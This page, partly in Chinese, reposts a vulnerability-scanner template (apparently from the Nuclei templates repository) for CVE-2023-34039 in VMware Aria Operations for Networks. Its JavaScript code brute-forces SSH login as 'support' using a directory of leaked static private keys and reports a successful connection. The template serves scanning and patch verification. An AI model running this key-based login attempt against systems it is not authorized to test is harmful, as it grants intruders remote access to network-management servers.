CVE-2023-34039: VMWare Aria Operations - Remote Code Execution

日期: 2025-08-01 | 影响软件: VMWare Aria Operations | POC: 已公开

漏洞描述

VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039) Version: All versions from 6.0 to 6.10

PoC代码[已公开]

id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.93246
    epss-percentile: 0.99797
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023
variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # init field can be used to make any preperations before the actual exploit
  # here we are reading all private keys from helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)
    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)
    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful
    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"
    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2
    threads: 10
    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - success && response
# digest: 4a0a004730450220500d7392393d92e23f8235b2a82711e3b45cf4aa10db3b8138c3262c48965fab022100bcff4c867f41e6224ffff2e5748ef95a2f5b670d55ca6094bc8439e9dcd55cbb:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/javascript/cves/2023/CVE-2023-34039.yaml

相关漏洞推荐